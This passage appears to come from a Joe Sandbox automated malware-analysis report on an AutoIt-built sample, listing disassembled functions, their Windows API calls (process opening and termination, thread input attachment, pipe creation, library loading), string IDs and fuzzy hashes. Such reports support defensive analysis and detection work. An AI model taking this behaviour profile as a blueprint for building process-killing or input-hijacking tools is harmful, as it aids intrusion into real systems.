                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: a038f97667a92ef10deac6981b59ca9fe0159c0aef103032e5d8aac953c279c4
                                                                        • Instruction ID: 1bf4f8ae4cfc427a828743c4e1218c96d77a57df07235c65473b97af63e53fb9
                                                                        • Opcode Fuzzy Hash: a038f97667a92ef10deac6981b59ca9fe0159c0aef103032e5d8aac953c279c4
                                                                        • Instruction Fuzzy Hash: 9C016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                                        Function 010459A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010459B4
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 010459CA
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 010459D9
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010459E8
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010459F2
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010459F9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        • Opcode ID: 51dc6739880227c5e55d4d96c76dc8d526281e508b88663bfe254d58632696bc
                                                                        • Instruction ID: bace9ee1ea5fa1b8aa54feee7cee8fbeff3fa6747bafd043caafd3fd2ee727e2
                                                                        • Opcode Fuzzy Hash: 51dc6739880227c5e55d4d96c76dc8d526281e508b88663bfe254d58632696bc
                                                                        • Instruction Fuzzy Hash: 22F012725411587BE7315A529C0DEEF7A7CEBCBB11F000259F945E1044D7A61A0187B5
                                                                        Function 010477EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 010477FE
                                                                        • EnterCriticalSection.KERNEL32(?,?,00FEC2B6,?,?), ref: 0104780F
                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00FEC2B6,?,?), ref: 0104781C
                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FEC2B6,?,?), ref: 01047829
                                                                          • Part of subcall function 010471F0: CloseHandle.KERNEL32(00000000,?,01047836,?,00FEC2B6,?,?), ref: 010471FA
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0104783C
                                                                        • LeaveCriticalSection.KERNEL32(?,?,00FEC2B6,?,?), ref: 01047843
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: ec66493f5a0707cd0e527bf86742beca41fea60a4d52c53942894f61be901f7f
                                                                        • Instruction ID: 1542d0f3b0973f73af5af2740ce43974d4fb38b493732b39eafdab58381066b7
                                                                        • Opcode Fuzzy Hash: ec66493f5a0707cd0e527bf86742beca41fea60a4d52c53942894f61be901f7f
                                                                        • Instruction Fuzzy Hash: AFF05473941212ABE7612B64EC889EB7769FF46301B141525F242A549CDBBB5412CB60
                                                                        Function 0103954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01039555
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 01039561
                                                                        • CloseHandle.KERNEL32(?), ref: 0103956A
                                                                        • CloseHandle.KERNEL32(?), ref: 01039572
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0103957B
                                                                        • HeapFree.KERNEL32(00000000), ref: 01039582
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: cf94b6e6eea25f863c10021ca56599eaf0a1296e5730b37b2a3610d8f83eff37
                                                                        • Instruction ID: 6040e4df7dd931302a974313ba5618d364f61a07809eaf5df32f01019f6492d6
                                                                        • Opcode Fuzzy Hash: cf94b6e6eea25f863c10021ca56599eaf0a1296e5730b37b2a3610d8f83eff37
                                                                        • Instruction Fuzzy Hash: D0E0E536804101BBDB111FE1EC0C95ABF39FF4A722B108320F255A146CCB7B9470DB50
                                                                        Function 01058CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 01058CFD
                                                                        • CharUpperBuffW.USER32(?,?), ref: 01058E0C
                                                                        • VariantClear.OLEAUT32(?), ref: 01058F84
                                                                          • Part of subcall function 01047B1D: VariantInit.OLEAUT32(00000000), ref: 01047B5D
                                                                          • Part of subcall function 01047B1D: VariantCopy.OLEAUT32(00000000,?), ref: 01047B66
                                                                          • Part of subcall function 01047B1D: VariantClear.OLEAUT32(00000000), ref: 01047B72
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        • Opcode ID: 6b67a7b4c10214375c140a5eca53f1cebf0792c5344ee80b3d65d67e9272bfd9
                                                                        • Instruction ID: 1b62818041411b4965fb315db0da8ace90b792df55f44b27f5bba99c2d9caffc
                                                                        • Opcode Fuzzy Hash: 6b67a7b4c10214375c140a5eca53f1cebf0792c5344ee80b3d65d67e9272bfd9
                                                                        • Instruction Fuzzy Hash: 809159706043419FCB50DF25C88096BBBE5EF99754F04896EFD8A8B361DB31E905CB92
                                                                        Function 0104323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                        • _memset.LIBCMT ref: 0104332E
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0104335D
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01043410
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0104343E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        • Opcode ID: 002ae0bbeb40685066a25fc10a6bad6ded5f97de84f9408bb32ce03875b76fdf
                                                                        • Instruction ID: e8333a92427391214640c2c31d57cc1c5f2c96c5dcd1678f9687aeeb8b9c618b
                                                                        • Opcode Fuzzy Hash: 002ae0bbeb40685066a25fc10a6bad6ded5f97de84f9408bb32ce03875b76fdf
                                                                        • Instruction Fuzzy Hash: B55101B16083219BE3569E28C8806AFBBE4BF85320F04667DF9D1DB1D1DB71E804C752
                                                                        Function 01042EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 01042F67
                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 01042F83
                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 01042FC9
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010A7890,00000000), ref: 01043012
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
                                                                        • Opcode ID: e9ed34803664cbb7c7112cbb8ddcee7365f1dc8229523c5ca836f740fce40402
                                                                        • Instruction ID: d39fa6afd21e8f26e0e6f33d56e0edd9b1f0439416b87d7adeb4296538b1c223
                                                                        • Opcode Fuzzy Hash: e9ed34803664cbb7c7112cbb8ddcee7365f1dc8229523c5ca836f740fce40402
                                                                        • Instruction Fuzzy Hash: 6E41C0B12043429FD724DF28D894B5ABBE4BF85310F004A7EFAE59B291D770E505CB62
                                                                        Function 01039A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01039ACC
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01039ADF
                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 01039B0F
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 365058703-1403004172
                                                                        • Opcode ID: b48196a03336751a798b0a934b2500cdfa5d6630a78b77337b0a04c04f609193
                                                                        • Instruction ID: 80a72f7c6436b08161090319676827579b6b0c495d43146d455bb4f1ef425f96
                                                                        • Opcode Fuzzy Hash: b48196a03336751a798b0a934b2500cdfa5d6630a78b77337b0a04c04f609193
                                                                        • Instruction Fuzzy Hash: B6212875A00108BEEF28EBA4CC85CFFBBACEF95354F104219F9A1A71E4DB7949059650
                                                                        Function 01066A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
                                                                          • Part of subcall function 00FE2111: GetStockObject.GDI32(00000011), ref: 00FE2163
                                                                          • Part of subcall function 00FE2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01066A86
                                                                        • LoadLibraryW.KERNEL32(?), ref: 01066A8D
                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01066AA2
                                                                        • DestroyWindow.USER32(?), ref: 01066AAA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        • Opcode ID: 42134fc917f804f60ffd2cb93dfdaeb0b5c6332f3b3d379824dd9024bd292811
                                                                        • Instruction ID: 887b5a99047fff930db8d339752ee4e0e851dc4c279fe79a1dda6c527d76ed6f
                                                                        • Opcode Fuzzy Hash: 42134fc917f804f60ffd2cb93dfdaeb0b5c6332f3b3d379824dd9024bd292811
                                                                        • Instruction Fuzzy Hash: A821AE71600205AFEF618E6ADC81EBF77EDEF49324F108619FA91A2181D373DC519BA0
                                                                        Function 01047357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 01047377
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 010473AA
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 010473BC
                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 010473F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: f3d6e0a0d125c45e01d5aa0a25418dfce40d26b44aaf237641197e3f5afd7485
                                                                        • Instruction ID: cbbd82198bd341e68328dc6e78e0608f54afde3fa0ec9021af701e8320655972
                                                                        • Opcode Fuzzy Hash: f3d6e0a0d125c45e01d5aa0a25418dfce40d26b44aaf237641197e3f5afd7485
                                                                        • Instruction Fuzzy Hash: C521B2B1500306ABDB209F69D885A9A7BE8AF45721F208A79FDE0E72D0D771D850CB51
                                                                        Function 01047425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 01047444
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01047476
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 01047487
                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 010474C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: c46aab477c91c9f988e9187ec4cb5c222eb6525a2ebd0a3af56aa623e90447e9
                                                                        • Instruction ID: 04e1bee7d4abf8f0c803aaa3646738b180208a9a682a21bef4b76c18478319d7
                                                                        • Opcode Fuzzy Hash: c46aab477c91c9f988e9187ec4cb5c222eb6525a2ebd0a3af56aa623e90447e9
                                                                        • Instruction Fuzzy Hash: EA21B8B1500306ABDB209F6C9884EAA7BE8AF95730F100B69FEE0E72D0DF719451C751
                                                                        Function 0104B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0104B297
                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0104B2EB
                                                                        • __swprintf.LIBCMT ref: 0104B304
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,01070980), ref: 0104B342
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu
                                                                        • API String ID: 3164766367-685833217
                                                                        • Opcode ID: d74b9225cbe2fdc2844cfc48191217d203855f162d62fd983ddb6101fcd6ae24
                                                                        • Instruction ID: 9f3b5e1fd21630349570130e4e55012351c1923c58feaf478edbc29a879183db
                                                                        • Opcode Fuzzy Hash: d74b9225cbe2fdc2844cfc48191217d203855f162d62fd983ddb6101fcd6ae24
                                                                        • Instruction Fuzzy Hash: E5218375A00209AFCB10DFA5CC84DEEB7B8EF89714B008069F945EB251DB35EA41DB61
                                                                        Function 0103AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                          • Part of subcall function 0103AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0103AA6F
                                                                          • Part of subcall function 0103AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0103AA82
                                                                          • Part of subcall function 0103AA52: GetCurrentThreadId.KERNEL32 ref: 0103AA89
                                                                          • Part of subcall function 0103AA52: AttachThreadInput.USER32(00000000), ref: 0103AA90
                                                                        • GetFocus.USER32 ref: 0103AC2A
                                                                          • Part of subcall function 0103AA9B: GetParent.USER32(?), ref: 0103AAA9
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0103AC73
                                                                        • EnumChildWindows.USER32(?,0103ACEB), ref: 0103AC9B
                                                                        • __swprintf.LIBCMT ref: 0103ACB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                        • String ID: %s%d
                                                                        • API String ID: 1941087503-1110647743
                                                                        • Opcode ID: 214fcbebaa4c6739f3e15480af6347a6780b93995f7bc68aadadfa8f798be418
                                                                        • Instruction ID: f42ff2a0ef8503c77066a6d8c6c5d101a59ac3cd861b6b415cff69110d983e3e
                                                                        • Opcode Fuzzy Hash: 214fcbebaa4c6739f3e15480af6347a6780b93995f7bc68aadadfa8f798be418
                                                                        • Instruction Fuzzy Hash: 1311CD75A00209EBDF11AFA08D84FEA77ACAF89700F0040B9BAC8EB141CB7559459B70
                                                                        Function 010422E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 01042318
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                        • API String ID: 3964851224-769500911
                                                                        • Opcode ID: d1fd947e568fe1c587c8e14f47a43032a32ce652440d80e9d3c1a043443aa531
                                                                        • Instruction ID: 5fc4c45b4ce729192298d1686b90f06987bec78c58300e044efaff0ff5751abe
                                                                        • Opcode Fuzzy Hash: d1fd947e568fe1c587c8e14f47a43032a32ce652440d80e9d3c1a043443aa531
                                                                        • Instruction Fuzzy Hash: 371161B0A0011DEFCF10EF54E9909FEB7B4FF16244F5084A9E894672A5EB325906DF50
                                                                        Function 0105F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0105F2F0
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0105F320
                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0105F453
                                                                        • CloseHandle.KERNEL32(?), ref: 0105F4D4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
